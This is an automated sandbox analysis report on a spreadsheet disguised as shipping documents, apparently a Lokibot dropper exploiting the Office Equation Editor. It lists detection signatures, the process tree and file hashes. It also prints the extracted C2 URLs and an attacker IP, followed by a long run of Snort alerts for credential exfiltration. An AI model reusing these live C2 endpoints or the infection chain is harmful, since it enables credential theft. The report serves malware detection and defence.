Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Original shipping documents.xlsx

Overview

General Information

Sample Name:Original shipping documents.xlsx
Analysis ID:491904
MD5:27eb25e6fbbbd37115055ecc4b557c53
SHA1:4c986607a941900d9d8804aa351dcab0cc4de224
SHA256:09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected Lokibot
Detected unpacking (changes PE section rights)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2688 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1484 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1268 cmdline: 'C:\Users\Public\vbc.exe' MD5: 59A67B5CCF01B6A564265797DC5E53E8)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://checkvim.com/ga14/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x13ffc:$a2: last_compatible_version
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.vbc.exe.400000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          4.2.vbc.exe.400000.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            4.2.vbc.exe.400000.1.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              4.2.vbc.exe.400000.1.raw.unpackLoki_1Loki Payloadkevoreilly
              • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x153fc:$a2: last_compatible_version
              4.2.vbc.exe.400000.1.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x13bff:$des3: 68 03 66 00 00
              • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 25 entries

              Sigma Overview

              Exploits:

              barindex
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.155.83.184, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1484, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1484, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1484, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1268
              Sigma detected: Execution from Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1484, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1268

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://checkvim.com/ga14/fre.php"]}
              Antivirus detection for URL or domainShow sources
              Source: http://checkvim.com/ga14/fre.phpAvira URL Cloud: Label: malware

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

              Compliance:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.1.unpack
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: 5}NC:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr
              Source: Binary string: C:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,4_2_00403D74
              Source: global trafficDNS query: name: checkvim.com
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.155.83.184:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.155.83.184:80

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49166 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49166 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49166 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49166 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49167 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49167 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49167 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49167 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49168 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49168 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49168
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49169 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49169 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49169
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49170
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49171
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49172
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49173
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49174
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49175
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49176
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49177
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49178
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49179
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49180
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49181
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49182
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49183
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49184
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49185
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49186
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49187
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49188
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49189
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49190
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49191
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49192
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49193
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49194
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49195
